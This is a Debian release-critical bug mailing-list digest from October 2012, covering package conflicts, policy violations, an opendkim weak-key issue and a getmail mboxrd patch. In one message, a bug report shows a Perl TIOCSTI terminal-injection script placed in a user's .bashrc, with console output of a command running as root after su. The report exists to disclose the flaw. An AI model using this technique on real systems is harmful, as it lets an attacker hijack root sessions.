Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#628843: login: tty hijacking possible in su via TIOCSTI ioctl

2012-10-25 Thread Ismaël RUAU
Hello,

I'm bumping this bug to point out that the problem is not 100% fixed.
Even though su -c is now safe, interactive su or su - are still at
risk and this should probably be reflected here on the BTS.

Unfortunately I don't see any way to fix this without removing the
controlling terminal of su'ed interactive shells like su -c does, but
this would totally cripple su and render su'ed interactive shells
unusable (su would then become equivalent to su -c $SHELL and we'd
hit bug #659878 which is a PITA).

I'll leave it to you maintainers whether to actually reopen this bug or not.


Scenario:
root uses su to get an interactive shell into a compromised user
account, which uses the aforementioned exploit, just slightly modified
to send an exit before the actual payload.

On the compromised account side:
 CONSOLE OUTPUT 
test-user$ cat ~/exploit.pl
#!/usr/bin/perl
require sys/ioctl.ph;
open my $tty_fh, '', '/dev/tty' or die $!;
foreach my $c (split //, exit\n.'echo Payload as $(whoami)'.$/) {
ioctl($tty_fh, TIOCSTI, $c);
}

test-user$ cat ~/.bashrc
snip
perl $HOME/exploit.pl
 END CONSOLE OUTPUT 

Now root actually uses su. Note that the only user keystrokes are the
initial su test-user, the rest is entirely automatic and part of the
exploit (I included the user/root shell prompts as displayed on my
terminal).

 CONSOLE OUTPUT 
root# su test-user
exit
echo Payload as $(whoami)
test-user$ exit
root# echo Payload as $(whoami)
Payload as root
 END CONSOLE OUTPUT 


-- 
Ismaël RUAU


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#631075: Installs two sysv init scripts

2012-10-25 Thread Salvatore Bonaccorso
Hi Giuseppe

I had a look at the debdiff between the version in testing an the
version in unstable and it looks quite big to ask for an unbock for
wheezy.

Would it possible to prepare a minimal possible fix for that only
resolving the serious bugs (probably also #649515 if also affecting
wheezy) for uploading to t-p-u and ask the release team?

Regards,
Salvatore


signature.asc
Description: Digital signature


Bug#627152: alsa-source: FTBFS on Debian Testing amd64

2012-10-25 Thread Steven Chamberlain
reopen 627152
notfixed alsa-base/1.0.25+1
thanks

Hi,

It seems like the intent was to remove src:alsa-source, but it seems
nobody has put in a request yet to ftp-master.

[ Jordi Mallach ]
* Drop alsa-source and all related packaging for alsa-modules. It was
  painful to maintain, didn't make the kernel team happy at all and was
  a general mess. The recommended way of getting new drivers is to look
  for a kernel backport (closes: #627152, 622652 —RC—, and also
  closes: #228070, #481849, #570618, #584336, #588385, #606046, #612123
  closes: #653542)

If I reopen the bug for now (that will alert anyone using apt-listbugs),
it should get closed automatically when the source package is actually
removed.

Thanks,
Regards,
-- 
Steven Chamberlain
ste...@pyro.eu.org


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed (with 1 errors): Re: Bug#627152: alsa-source: FTBFS on Debian Testing amd64

2012-10-25 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 reopen 627152
Bug #627152 {Done: Jordi Mallach jo...@debian.org} [alsa-source] alsa-source: 
FTBFS on Debian Testing amd64
'reopen' may be inappropriate when a bug has been closed with a version;
all fixed versions will be cleared, and you may need to re-add them.
Bug reopened
No longer marked as fixed in versions alsa-base/1.0.25+1.
 notfixed alsa-base/1.0.25+1
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
627152: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=627152
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed (with 1 errors): Re: Bug#688689: ncbi-blast+: trying to overwrite '/usr/bin/seedtop', which is also in package blast2 1:2.2.26.20120620-2

2012-10-25 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 # Reassign to where the bug was actually fixed:
 reassign 688689 ncbi-blast+
Bug #688689 {Done: u...@debian.org (Aaron M. Ucko)} [blast2] ncbi-blast+: 
trying to overwrite '/usr/bin/seedtop', which is also in package blast2 
1:2.2.26.20120620-2
Bug reassigned from package 'blast2' to 'ncbi-blast+'.
No longer marked as found in versions ncbi-tools6/6.1.20120620-2.
No longer marked as fixed in versions ncbi-tools6/6.1.20120620-2.
 # Merge back with the bug it was cloned from
 forcemerge 688684 688689
Bug #688684 {Done: Olivier Sallou osal...@debian.org} [ncbi-blast+] 
ncbi-blast+: trying to overwrite '/usr/bin/seedtop', which is also in package 
blast2 1:2.2.26.20120620-2
Bug #688689 {Done: u...@debian.org (Aaron M. Ucko)} [ncbi-blast+] ncbi-blast+: 
trying to overwrite '/usr/bin/seedtop', which is also in package blast2 
1:2.2.26.20120620-2
Marked as fixed in versions ncbi-blast+/2.2.27-2.
Marked as found in versions ncbi-blast+/2.2.27-1.
Merged 688684 688689
 # Fifth time lucky?
 done

End of message, stopping processing here.

Please contact me if you need assistance.
-- 
688684: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=688684
688689: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=688689
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#691394: opendkim: DomainKeys Identified Mail (DKIM) Verifiers may inappropriately convey message trust

2012-10-25 Thread Scott Kitterman
On Thursday, October 25, 2012 09:38:36 AM Thijs Kinkhorst wrote:
 On Thu, October 25, 2012 07:18, Scott Kitterman wrote:
  Package: opendkim
  Version: 2.0.1+dfsg-1
  Severity: grave
  Tags: security upstream
  Justification: user security hole
  
  See http://www.kb.cert.org/vuls/id/268267, VU#268267
  
  opendkim in squeeze, wheezy, sid offers no method to prevent use of keys
  less than 1024 bits.  This is added in the new upstream release, 2.6.8,
  that
  was released just for this issue.
 
 Thanks for your quick action on this. But is it really a user security
 hole? The responsibility is with users not to use unsafe key sizes. GnuPG
 works with small key sizes, I do not see that as a user security hole per
 se.
 
 Of course this proactive measure can help to prevent mistakes, so if
 possible it would be good if we could still get this into wheezy.

I agree that on the sending end this is mostly an operational issue, but on 
the receiving side this is different.  Here's a description of the attack that 
the changes in opendkim 2.6.8 will prevent:

http://www.wired.com/threatlevel/2012/10/dkim-vulnerability-widespread/

With what's in Squeeze/Wheezy now, a Debian mail server would have validated 
the mail as well.  With 2.6.8, the signature would have been ignored (in the 
default configuration) because the key size is too small.

This is not something that can be dealt with operationally.  Unlike GPG, where 
keys are trusted based on signatures and web of trust (and people can decline 
to sign bad keys), in DKIM keys are trusted based on their being published in 
the sending domain's DNS and there is no human in the loop.

Scott K

signature.asc
Description: This is a digitally signed message part.


Bug#633799: getmail Bug#633799: how this should be handled

2012-10-25 Thread Osamu Aoki
Hi,

If OK to upload a patched revision for Bug#633799, I will be happy to
upload it targeting wheezy.

I need guidance on how to handle Bug#633799 for getmail with a newly
bumped critical bug.
 http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=633799

Here is the situation.

The mbox format historically has several variants.  
 http://docs.python.org/library/mailbox.html#mbox

getmail used python standard library as is so it was mboxo.
It has annoying shortcomings but people have been using it.

getmail documentation said getmail use mboxrd for mbox.b (which is
new improved version of mbox.)

Although mboxo is not the best technical solution, it is python choice,
I felt this is mere documentation bug as wishlist.

Since freeze, getmail upstream decided to use real mboxrd and applied
patch prompted by a bug reporter.  Also this bug has been bumped back to
be critical by the same bug reporter claiming Serious data loss.  (It
is true that it causes some minor and ugly data loss which is not
pretty. But I understand people have been having quite relaxed attitude
on this type of data loss historically.)

Considering relatively small size of patch which is already applied by
upstream, can I upload a new Debian revision to unstable with this
mboxrd format change for getmail targeting wheezy. (Upstream diff for
this attached.  patch to be applied will be very similar as this except
for program version number.) 

Or do you think changing basic program behavior for the mbox storage at
this stage too late even if it is to match with the documentation.

Or not to touch package and leave this bug report as important or
normal so people will notice better but not RC.

Regards,

Osamu


diff --git a/getmailcore/__init__.py b/getmailcore/__init__.py
index d1eb458..d37dd3d 100755
--- a/getmailcore/__init__.py
+++ b/getmailcore/__init__.py
@@ -16,7 +16,7 @@ if sys.hexversion  0x2030300:
 raise ImportError('getmail version 4 requires Python version 2.3.3'
   ' or later')
 
-__version__ = '4.34.0'
+__version__ = '4.35.0'
 
 __all__ = [
 'baseclasses',
diff --git a/getmailcore/message.py b/getmailcore/message.py
index 0137ba3..0e54ef8 100755
--- a/getmailcore/message.py
+++ b/getmailcore/message.py
@@ -10,6 +10,7 @@ __all__ = [
 import os
 import time
 import cStringIO
+import re
 import email
 import email.Errors
 import email.Utils
@@ -29,6 +30,9 @@ message_attributes = (
 'recipient'
 )
 
+RE_FROMLINE = re.compile(r'^(*From )', re.MULTILINE)
+
+
 ###
 def corrupt_message(why, fromlines=None, fromstring=None):
 log = getmailcore.logging.Logger()
@@ -130,19 +134,25 @@ class Message(object):
 it by writing out what we need, letting the generator write out the
 message, splitting it into lines, and joining them with the platform
 EOL.
+
+Note on mangle_from: the Python email.Generator class apparently only
+quotes From , not From  (i.e. it uses mboxo format instead of
+mboxrd).  So we don't use its mangling, and do it by hand instead.
 '''
-f = cStringIO.StringIO()
 if include_from:
-# This needs to be written out first, so we can't rely on the
-# generator
-f.write('From %s %s' % (mbox_from_escape(self.sender),
-time.asctime()) + os.linesep)
+# Mbox-style From line, not rfc822 From: header field.
+fromline = 'From %s %s' % (mbox_from_escape(self.sender),
+   time.asctime()) + os.linesep
+else:
+fromline = ''
 # Write the Return-Path: header
-f.write(format_header('Return-Path', '%s' % self.sender))
+rpline = format_header('Return-Path', '%s' % self.sender)
 # Remove previous Return-Path: header fields.
 del self.__msg['Return-Path']
 if delivered_to:
-f.write(format_header('Delivered-To', self.recipient or 'unknown'))
+dtline = format_header('Delivered-To', self.recipient or 'unknown')
+else:
+dtline = ''
 if received:
 content = 'from %s by %s with %s' % (
 self.received_from, self.received_by, self.received_with
@@ -151,13 +161,20 @@ class Message(object):
 content += ' for %s' % self.recipient
 content += '; ' + time.strftime('%d %b %Y %H:%M:%S -',
 time.gmtime())
-f.write(format_header('Received', content))
-gen = Generator(f, mangle_from, 0)
+receivedline = format_header('Received', content)
+else:
+receivedline = ''
 # From_ handled above, always tell the generator not to include it
 try:
+tmpf = cStringIO.StringIO()
+gen = Generator(tmpf, False, 0)
 gen.flatten(self.__msg, False)
-f.seek(0)
-

Processed: Re: Bug#660259: mpich2: FTBFS: [sparc] missing files

2012-10-25 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 # A maintainer asked for someone to NMU
 tags 660259 + help
Bug #660259 [libmpich2-dev] mpich2: FTBFS:  [sparc] missing files
Bug #666140 [libmpich2-dev] mpich2: FTBFS: dh_install: libmpich2-3 missing 
files (usr/lib/libmpich.so.3*), aborting
Added tag(s) help.
Added tag(s) help.
 # This also blocks transition of #666066 and #653616 fixes into testing
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
660259: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=660259
666140: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=666140
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#633799: getmail4: Mboxrd format is not supported

2012-10-25 Thread Christoph Anton Mitterer
Hi.

On Thu, 2012-10-25 at 21:26 +0900, Osamu Aoki wrote:
 But if you read history of bug report including patches, you could have
 written a bit kinder tone message.  I feel a bit sad to see this message.
Well it wasn't meant particularly personally or offensive,... I just
think the issue is quite serious.

I see now, that you considered this just to be a documentation
problem...

IMHO, one needs to look throughout all Debian, to find any places where
mboxo is still used.
The problem is, that using mboxo itself (even if documented) is IMHO a
serious bug, as the format is utterly broken.

Especially no user expects that when he stores mail it's being
irrecoverably cluttered up (which is what mboxo does).
Actually I'd say that most people even don't know that there are
different subformats of mbox.


 No. This is not news.  So not an appropriate place.
 Right place should be more like README.Debian or BUGS.
Mhh well in principle that's true, but to my experience, NEWS is the
only place (apart from release-notes and debconfi dialgues) that is
likely read by most people (well at least by those that have
apt-listchanges installed).
Does Debian expect people to read README.Debian?


  - if possibly in a priority-high dialogue via debconf
 This is not right place per policy.
Is that forbidden? I used to know several packages that put informative
dialogues there (even though not with priority high, I guess).



  If upstream is stupid and doesn't want to fix this, then we really
 Please do not call upstream stupid ... especially in public like this.
 I think you are bright but this is not very polite.
As I already told upstream himself,... I said _if_ (perhaps I should
have written even if)...
So when I wrote this, I haven't thought you'd just consider this as a
documentation issue.
Therefore I wanted to make clear, that even when an upstream would be
stupid/not cooperating/etc. ... we (in Debian) should not just lean
back.


  really must warn our users on that issue.
  And even if upstream would fix it, we still would need to warn our users
  at least in the NEWS file / release notes... that all their mail from
  previous years is likely corrupted.
 mboxo has been always so and have been widely used.
I know, and this is actually quite a problem. As I wrote above, most
people don't know this... and AFAIU the corruption inherent to this
format can't be undone.

 mboxrd is technically superior.
Yes,... an alternative is mboxcl2... but it has also it's drawbacks.


 anyone who stores file in mbox should know there are risks as you
 describe.
Phew... I mean I wouldn't call myself uneducated ;-) ... and I was
really shocked when I learned about this recently.
I asked around at my friends, all studied computer scientists and decent
sysadmins... noone knew.


 I think you are a bit exxagurating severity of trivial part of data
 change.
Actually most people seem to see it like this. I can't join that opinion
however.
I mean the change is little, arguably, but a) it can't be undone
automatically and b) given, that storing mail is the core functionality
of e.g. getmail, it think it's quite severe. That would be the same if
your paint program changes all the colours (just a tiny bit) when you
save your image.


 Let's ask release manager how this should be handled now.
Saw your mail :) Thanks for your efforts :)


Best wishes,
Chris.


smime.p7s
Description: S/MIME cryptographic signature


Processed: Re: [php-maint] Bug#691413: libapache2-mod-php5: php files without php extension executed by default

2012-10-25 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 reassign 691413 mime-support
Bug #691413 [libapache2-mod-php5] libapache2-mod-php5: php files without php 
extension executed by default
Bug reassigned from package 'libapache2-mod-php5' to 'mime-support'.
No longer marked as found in versions php5/5.3.3-7+squeeze14.
Ignoring request to alter fixed versions of bug #691413 to the same values 
previously set
 affects 691413 +php5
Bug #691413 [mime-support] libapache2-mod-php5: php files without php extension 
executed by default
Added indication that 691413 affects php5
 affects 589384 +php5
Bug #589384 {Done: Brian White bcwh...@pobox.com} [mime-support] 
libapache2-mod-php5: Even with new SetHandler config, php is still activated 
because of mime type
Added indication that 589384 affects php5
 forcemerge 589384 691413
Bug #589384 {Done: Brian White bcwh...@pobox.com} [mime-support] 
libapache2-mod-php5: Even with new SetHandler config, php is still activated 
because of mime type
Bug #691413 [mime-support] libapache2-mod-php5: php files without php extension 
executed by default
Severity set to 'serious' from 'normal'
Marked Bug as done
Marked as fixed in versions mime-support/3.52-1.
Marked as found in versions mime-support/3.44-1.
Merged 589384 691413
 thank you
Stopping processing here.

Please contact me if you need assistance.
-- 
589384: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=589384
691413: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=691413
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#690373: Ping: gdcm: incomplete copyright file (#690373)

2012-10-25 Thread Mathieu Malaterre
Hi,

On Thu, Oct 25, 2012 at 2:45 PM, Andreas Tille ti...@debian.org wrote:
 Hi Mathieu,

 I pinged you two days ago but did not got any answer.  If I do not hear
 from you I'll take action at this weekend, latest next Monday.

Feel free to do whatever you want with this. I am not taking action
until 2.2.2 comes out, of debian goes out of freeze (whichever comes
first)

Thx
-- 
Mathieu


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#688500: marked as done (scuttle: configuration file in /var (policy 10.7): /var/lib/scuttle/config_debconf.inc.php)

2012-10-25 Thread Debian Bug Tracking System
Your message dated Thu, 25 Oct 2012 14:49:49 +
with message-id e1trokn-0005l9...@franck.debian.org
and subject line Bug#688500: fixed in scuttle 0.7.4-8
has caused the Debian Bug report #688500,
regarding scuttle: configuration file in /var (policy 10.7): 
/var/lib/scuttle/config_debconf.inc.php
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
688500: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=688500
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: scuttle
Version: 0.7.4-7
Severity: serious
User: debian...@lists.debian.org
Usertags: piuparts
Control: found -1 0.7.4-6

Hi,

during a test with piuparts I noticed your package modifies shipped
files.
The modified file is a configuration file that is placed in /var
This is forbidden by the policy, see
http://www.debian.org/doc/debian-policy/ch-files.html#s-config-files

10.7.2: Location: Any configuration files created or used by your
package must reside in /etc. [...]

This file will be overwritten on upgrades/reinstallation, destroying
local modifications. Violates 10.7.3.

[following is the bug template for modifying conffiles, which may have
some useful information, too]

10.7.3: [...] The easy way to achieve this behavior is to make the
configuration file a conffile. [...] This implies that the default
version will be part of the package distribution, and must not be
modified by the maintainer scripts during installation (or at any
other time).

Note that once a package ships a modified version of that conffile,
dpkg will prompt the user for an action how to handle the upgrade of
this modified conffile (that was not modified by the user).

Further in 10.7.3: [...] must not ask unnecessary questions
(particularly during upgrades) [...]

If a configuration file is customized by a maintainer script after
having asked some debconf questions, it may not be marked as a
conffile. Instead a template could be installed in /usr/share and used
by the postinst script to fill in the custom values and create (or
update) the configuration file (preserving any user modifications!).
This file must be removed during postrm purge.
ucf(1) may help with these tasks.
See also http://wiki.debian.org/DpkgConffileHandling

In https://lists.debian.org/debian-devel/2012/09/msg00412.html and
followups it has been agreed that these bugs are to be filed with
severity serious.

debsums reports modification of the following files,
from the attached log (scroll to the bottom...):

  /var/lib/scuttle/config_debconf.inc.php


cheers,

Andreas


scuttle_0.7.4-7.log.gz
Description: GNU Zip compressed data
---End Message---
---BeginMessage---
Source: scuttle
Source-Version: 0.7.4-8

We believe that the bug you reported is fixed in the latest version of
scuttle, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 688...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Marcelo Jorge Vieira (metal) me...@debian.org (supplier of updated scuttle 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Mon, 22 Oct 2012 02:18:10 -0200
Source: scuttle
Binary: scuttle
Architecture: source all
Version: 0.7.4-8
Distribution: unstable
Urgency: high
Maintainer: Marcelo Jorge Vieira (metal) me...@debian.org
Changed-By: Marcelo Jorge Vieira (metal) me...@debian.org
Description: 
 scuttle- Web-based social bookmarking system
Closes: 688500
Changes: 
 scuttle (0.7.4-8) unstable; urgency=high
 .
   * Fixed configuration file in /var (policy 10.7) (Closes: #688500)
 - Moving config_debconf.inc.php from /var/lib to /etc
Checksums-Sha1: 
 6f63492057d60bce3846883c7486de96b58e64f6 1827 scuttle_0.7.4-8.dsc
 b85aa2e89020ecb1c06aab39406a32dbcc959274 13015 scuttle_0.7.4-8.diff.gz
 7bdd3c0944a3ba9563b391a61189f52d7fa79017 181378 scuttle_0.7.4-8_all.deb
Checksums-Sha256: 
 fae08dee7cab3112455405df3226669a45bb90adeddeb4f67a67f8352b5e89e0 1827 
scuttle_0.7.4-8.dsc
 7198fedc6bbde084b82ebf7c10ec68ea13cf8dda181324ec8d671c769354cd60 13015 
scuttle_0.7.4-8.diff.gz
 5375d7a86dae0ec92907c5059ac010f3e9e6145919093eb5034388d29ae2cf1d 181378 
scuttle_0.7.4-8_all.deb
Files: 
 5b4bd4aec193b341957c0ac5c21db8e8 1827 web 

Bug#691306: Bug #691306: iptables add 4 rules instead just one in kernel INPUT chain

2012-10-25 Thread Laurence J. Lane
iptables is supposed to write a rule for each of a hostname's IP
addresses. iptables -A INPUT --source www.google.com gives me six
rules for the six IP addresses. Adding --source www.google.com bumps
that up to thirty-six rules.

I'm uncertain of the issue with duplicate addresses for localhost.
I'll ask upstream if iptables should filter out duplicates.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#690902: Driver or hardware problem

2012-10-25 Thread Andev
Is there any way to debug this? I can provide you any information you need
to triage..

On Mon, Oct 22, 2012 at 2:35 PM, Anton Gladky gladky.an...@gmail.comwrote:

 Hello,

 it looks like driver or hardware problem.
 I never saw such crash on my machines.

 Cheers,

 Anton



Processed: libroot-proof-dev: fails to upgrade from 'sid' - trying to overwrite /usr/include/root/TProofOutputFile.h

2012-10-25 Thread Debian Bug Tracking System
Processing control commands:

 affects -1 + libroot-proof-proofplayer-dev
Bug #691437 [libroot-proof-dev] libroot-proof-dev: fails to upgrade from 'sid' 
- trying to overwrite /usr/include/root/TProofOutputFile.h
Added indication that 691437 affects libroot-proof-proofplayer-dev

-- 
691437: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=691437
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#691437: libroot-proof-dev: fails to upgrade from 'sid' - trying to overwrite /usr/include/root/TProofOutputFile.h

2012-10-25 Thread Andreas Beckmann
Package: libroot-proof-dev
Version: 5.34.02-1~exp1
Severity: serious
User: debian...@lists.debian.org
Usertags: piuparts
Control: affects -1 + libroot-proof-proofplayer-dev

Hi,

during a test with piuparts I noticed your package fails to upgrade from
'sid' to 'experimental'.
It installed fine in 'sid', then the upgrade to 'experimental' fails
because it tries to overwrite other packages files without declaring a
Breaks/Replaces relation.

See policy 7.6 at
http://www.debian.org/doc/debian-policy/ch-relationships.html#s-replaces

From the attached log (scroll to the bottom...):

  Preparing to replace libroot-proof-dev 5.34.00-1 (using 
.../libroot-proof-dev_5.34.02-1~exp1_amd64.deb) ...
  Unpacking replacement libroot-proof-dev ...
  dpkg: error processing 
/var/cache/apt/archives/libroot-proof-dev_5.34.02-1~exp1_amd64.deb (--unpack):
   trying to overwrite '/usr/include/root/TProofOutputFile.h', which is also in 
package libroot-proof-proofplayer-dev 5.34.00-1
  Preparing to replace libroot-proof5.34:amd64 5.34.00-1 (using 
.../libroot-proof5.34_5.34.02-1~exp1_amd64.deb) ...
  Unpacking replacement libroot-proof5.34:amd64 ...
  Preparing to replace libroot-proof-proofplayer-dev 5.34.00-1 (using 
.../libroot-proof-proofplayer-dev_5.34.02-1~exp1_amd64.deb) ...
  Unpacking replacement libroot-proof-proofplayer-dev ...

cheers,

Andreas


libroot-proof-proofplayer-dev_5.34.02-1~exp1.log.gz
Description: GNU Zip compressed data


Bug#691439: libfreeipmi12: copyright file missing after upgrade (policy 12.5)

2012-10-25 Thread Andreas Beckmann
Package: libfreeipmi12
Version: 1.1.5-4
Severity: serious
User: debian...@lists.debian.org
Usertags: piuparts

Hi,

a test with piuparts revealed that your package misses the copyright
file after an upgrade from squeeze to wheezy, which is a violation of
Policy 12.5:
http://www.debian.org/doc/debian-policy/ch-docs.html#s-copyrightfile

After the upgrade /usr/share/doc/$PACKAGE/ is just an empty directory.

From the attached log (scroll to the bottom...):
(output from 'ls -lad /u/s/d/$PKG' and 'ls -la /u/s/d/$PKG/')

  MISSING COPYRIGHT FILE: /usr/share/doc/libfreeipmi12/copyright
  drwxr-xr-x 2 root root 40 Oct 22 04:22 /usr/share/doc/libfreeipmi12
  total 0
  drwxr-xr-x  2 root root   40 Oct 22 04:22 .
  drwxr-xr-x 77 root root 1620 Oct 22 04:22 ..


Additional info may be available here:
http://wiki.debian.org/MissingCopyrightFile


cheers,

Andreas


libfreeipmi12_1.1.5-4.log.gz
Description: GNU Zip compressed data


Bug#627152: [Pkg-alsa-devel] Bug#627152: alsa-source: FTBFS

2012-10-25 Thread Elimar Riesebieter
* Jakub Wilk jw...@debian.org [2012-10-25 14:03 +0200]:

   * Rename source package, make it 3.0 (native).
   * Drop alsa-source and all related packaging for alsa-modules. It was
 painful to maintain, didn't make the kernel team happy at all and was
 a general mess.
 
 The old source package (alsa-driver) and the RC-buggy binary package
 (alsa-source) are still in unstable and wheezy:
 | $ rmadison -S -s sid,wheezy alsa-driver
 |  alsa-base| 1.0.23+dfsg-4 | sid   | all
 |  alsa-base-udeb   | 1.0.23+dfsg-4 | sid/main/debian-installer | all
 |  alsa-driver  | 1.0.23+dfsg-4 | wheezy| source
 |  alsa-driver  | 1.0.23+dfsg-4 | sid   | source
 |  alsa-source  | 1.0.23+dfsg-4 | wheezy| all
 |  alsa-source  | 1.0.23+dfsg-4 | sid   | all
 |  linux-sound-base | 1.0.23+dfsg-4 | wheezy| all
 |  linux-sound-base | 1.0.23+dfsg-4 | sid   | all
 
 Should they be removed?

Yes, please.

Thanks
Elimar

-- 
  On the keyboard of life you have always
  to keep a finger at the escape key;-)


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#691440: apache2-suexec: copyright file missing after upgrade (policy 12.5)

2012-10-25 Thread Andreas Beckmann
Package: apache2-suexec
Version: 2.4.2-2
Severity: serious
User: debian...@lists.debian.org
Usertags: piuparts

Hi,

a test with piuparts revealed that your package misses the copyright
file after an upgrade from squeeze to wheezy, which is a violation of
Policy 12.5:
http://www.debian.org/doc/debian-policy/ch-docs.html#s-copyrightfile

After the upgrade /usr/share/doc/$PACKAGE/ is just an empty directory.

From the attached log (scroll to the bottom...):
(output from 'ls -lad /u/s/d/$PKG' and 'ls -la /u/s/d/$PKG/')

  MISSING COPYRIGHT FILE: /usr/share/doc/apache2-suexec/copyright
  drwxr-xr-x 2 root root 40 Oct 22 03:29 /usr/share/doc/apache2-suexec
  total 0
  drwxr-xr-x   2 root root   40 Oct 22 03:29 .
  drwxr-xr-x 102 root root 2140 Oct 22 03:29 ..


Additional info may be available here:
http://wiki.debian.org/MissingCopyrightFile


cheers,

Andreas


apache2-suexec_2.4.2-2.log.gz
Description: GNU Zip compressed data


Bug#691441: libqglviewer-qt4-2: copyright file missing after upgrade (policy 12.5)

2012-10-25 Thread Andreas Beckmann
Package: libqglviewer-qt4-2
Version: 2.3.15-1~exp1
Severity: serious
User: debian...@lists.debian.org
Usertags: piuparts

Hi,

a test with piuparts revealed that your package misses the copyright
file after an upgrade from squeeze to wheezy, which is a violation of
Policy 12.5:
http://www.debian.org/doc/debian-policy/ch-docs.html#s-copyrightfile

After the upgrade /usr/share/doc/$PACKAGE/ is just an empty directory.

From the attached log (scroll to the bottom...):
(from 'ls -lad /u/s/d/$PKG' and 'ls -la /u/s/d/$PKG/')

  MISSING COPYRIGHT FILE: /usr/share/doc/libqglviewer-qt4-2/copyright
  drwxr-xr-x 2 root root 40 Oct 21 15:32 /usr/share/doc/libqglviewer-qt4-2
  total 0
  drwxr-xr-x   2 root root   40 Oct 21 15:32 .
  drwxr-xr-x 115 root root 2380 Oct 21 15:32 ..

Additional info may be available here:
http://wiki.debian.org/MissingCopyrightFile


cheers,

Andreas


libqglviewer-qt4-2_2.3.15-1~exp1.log.gz
Description: GNU Zip compressed data


Bug#691442: python{, 3}-sip-{dev, dbg}: copyright file missing after upgrade (policy 12.5)

2012-10-25 Thread Andreas Beckmann
Package: python-sip-dev,python3-sip-dev,python3-sip-dbg
Version: 4.14-2
Severity: serious
User: debian...@lists.debian.org
Usertags: piuparts

Hi,

a test with piuparts revealed that your package misses the copyright
file after an upgrade from sid to experimental, which is a violation of
Policy 12.5:
http://www.debian.org/doc/debian-policy/ch-docs.html#s-copyrightfile

After the upgrade /usr/share/doc/$PACKAGE/ is just an empty directory.

From the attached log (scroll to the bottom...):
(from 'ls -lad /u/s/d/$PKG' and 'ls -la /u/s/d/$PKG/')

  MISSING COPYRIGHT FILE: /usr/share/doc/python-sip-dev/copyright
  drwxr-xr-x 2 root root 40 Oct 23 06:09 /usr/share/doc/python-sip-dev
  total 0
  drwxr-xr-x  2 root root   40 Oct 23 06:09 .
  drwxr-xr-x 89 root root 1940 Oct 23 06:09 ..


Additional info may be available here:
http://wiki.debian.org/MissingCopyrightFile


cheers,

Andreas


python-sip-dev_4.14-2.log.gz
Description: GNU Zip compressed data


Bug#691439: Acknowledgement (libfreeipmi12: copyright file missing after upgrade (policy 12.5))

2012-10-25 Thread Andreas Beckmann
Control: reassign -1 libipmidetect0,libfreeipmi12 1.1.5-4

Uups, wrong template used ...

That happens during the sid - experimental upgrade, not squeeze-wheezy.

Same problem with libipmidetect0.


Andreas


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#691441: libqglviewer-qt4-2: copyright file missing after upgrade (policy 12.5)

2012-10-25 Thread Andreas Beckmann
Uups, wrong template used ...

That happens during the sid - experimental upgrade, not squeeze-wheezy.

Andreas


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



